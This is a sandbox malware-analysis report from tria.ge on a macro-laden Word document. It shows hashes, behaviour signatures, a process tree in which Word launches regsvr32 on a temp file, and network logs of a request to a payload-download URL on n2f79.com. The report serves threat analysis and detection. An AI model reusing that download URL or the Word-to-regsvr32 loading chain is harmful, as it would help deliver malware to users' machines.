Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

documento ...20.doc

windows7_x64

10

documento ...20.doc

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    11/07/2020, 07:18 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    documento ufficiale,07.20.doc

  • Size

    147KB

  • MD5

    29d55324310c106a92fd0e1b422b39de

  • SHA1

    d87feba63dab58c4754c205b1c3cda9169d9a274

  • SHA256

    604d7046297dcbf29e1e3a53ecf27136c4e39b2e36fe2314559f380b564ff7b4

  • SHA512

    5b478c89aebec5d85723e9b6e84115514e0e8c60a589b7426169ca147dbc97d4357ef9283ee42d33a7fcde215350ea951f2e2d4ecc228f8d85926937c48f3ac6

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\documento ufficiale,07.20.doc"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1356
    • C:\Windows\System32\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" wG.tmp
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: GetForegroundWindowSpam
      PID:1052

Network

  • flag-unknown
    DNS
    n2f79.com
    Remote address:
    8.8.8.8:53
    Request
    n2f79.com
    IN A
    Response
    n2f79.com
    IN A
    95.181.178.46
  • flag-unknown
    GET
    http://n2f79.com/iz5/yaca.php?l=kpt1.cab
    WINWORD.EXE
    Remote address:
    95.181.178.46:80
    Request
    GET /iz5/yaca.php?l=kpt1.cab HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: n2f79.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Sat, 11 Jul 2020 07:18:34 GMT
    Server: Apache/2.2.15 (CentOS)
    X-Powered-By: PHP/7.2.31
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • 95.181.178.46:80
    http://n2f79.com/iz5/yaca.php?l=kpt1.cab
    http
    WINWORD.EXE
    581 B
     411 B
     5
    5

    HTTP Request

    GET http://n2f79.com/iz5/yaca.php?l=kpt1.cab

    HTTP Response

    404
  • 224.0.0.252:5355
    100 B
     2
  • 10.7.0.255:137
    netbios-ns
    234 B
     3
  • 8.8.8.8:53
    n2f79.com
    dns
    55 B
     71 B
     1
    1

    DNS Request

    n2f79.com

    DNS Response

    95.181.178.46

  • 239.255.255.250:1900
    966 B
     6
  • 239.255.255.250:1900

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.